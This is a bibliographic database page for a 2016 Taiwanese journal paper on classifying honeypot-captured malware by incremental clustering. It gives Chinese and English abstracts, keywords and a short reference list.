透過您的圖書館登入 IP:3.141.202.187
透過您的圖書館登入
IP:3.141.202.187
  • 精確檢索 : 冠狀病毒
  • 模糊檢索 : 冠狀病毒
  • 冠狀病毒感染
    冠狀病毒疾病
  • 查詢出版品: 冠狀病毒
進階查詢
查詢歷史
主題瀏覽
  • 期刊

基於漸增式分群法之惡意程式自動分類研究

Automatic malware classification based on incremental clustering algorithm

陳嘉玫(Chia-Mei Chen) 賴谷鑫(Gu-Hsin Lai)
《電子商務學報》 18卷2期 (2016/12) Pp. 225-247
https://doi.org/10.6188/JEB.2016.18(2).03
全文下載

摘要

近年來網路犯罪份子為了有效地躲避安全機制的檢驗,而不斷地開發惡意程式或是進行變種。現今分析方式大多數都只分析單一二進位檔案型態之惡意程式,無法適合誘捕系統所捕獲到之原始碼與二進位檔混和型態的惡意程式。目前仍然缺少一個有效且快速分析的工具針對誘捕系統所捕獲的惡意程式做分析。本研究提出一個惡意程式分類系統,此系統擷取惡意程式原始碼、以及檔案結構作為特徵值並且使用漸進式分群法分群。本研究利用漸增式的分群法改善階層式分群演算法效率並且藉由惡意程式分群可以知道新捕獲的惡意程式是否屬於已知的分類或是屬於新的類型。本研究與網路上知名病毒偵測與分類平台Virustotal比較以驗證分類準確度,實驗證明本研究所提出的分類優於Virustotal。

關鍵字

誘捕系統 惡意程式分類 靜態分析 漸增式分群

並列摘要

In recent years, cybercriminals have developed new malware or variants in order to effectively evade inspection from security mechanisms. Most prior works focused on analyzing malware which contain only single binary file. However, most honeypot captured malware contain several binary and source files. Therefore, existing malware analysis approaches do not suitable for honeypot captured malware. In this research, a novel malware classification approach which analyzes features extracted from malware’s file structure, source code and binary files and file name is proposed. An incremental clustering algorithm is developed to replace traditional hierarchical clustering algorithm for improving efficiency. By means of proposed system, when a honeypot captures a new malware, IT security staff could know whether the new malware belongs to any existing clusters or not. To evaluate the performance of proposed system, the proposed approach is compared with Virustotal- a popular platform for malware detection and classification. The experiment result shows that the proposed approach outperforms Virustotal.

並列關鍵字

Honeypot Classification of Malware Static analysis Incremental clustering

參考文獻

Bailey, M., Andersen, J., Morleyman, Z., & Jahanian, F. (2007). Automated Classification and Analysis of Internet Malware. Proceedings of the 10th International Conference on Recent advances in intrusion detection (RAID'07), 178-197.
Cosma, G., & Joy, M. (2012). An Approach to Source-Code Plagiarism Detection and Investigation Using Latent Semantic Analysis. Computers. IEEE Transactions on, 61(3), 379-394.
Day, W. H., & Edelsbrunner, H. (1984). Efficient algorithms for agglomerative hierarchical clustering methods. Journal of classification, 1(1), 7-24.
Firdausi, I., Lim, C., Erwin, A., & Nugroho, A. S. (2010). Analysis of Machine learning Techniques Used in Behavior-Based Malware Detection. Proceedings of 2nd International Conference on Advances in Computing, Control, and Telecommunication Technologies, 201-203
Inoue,D., Yoshioka, K., Eto, M., Hoshizawa, Y., & Nakao, K. (2008). Malware Behavior Analysis in Isolated Miniature Network for Revealing Malware's Network Activity. Proceedings of the IEEE International Conference on Communications (ICC 2008), 1715-1721

延伸閱讀

全文下載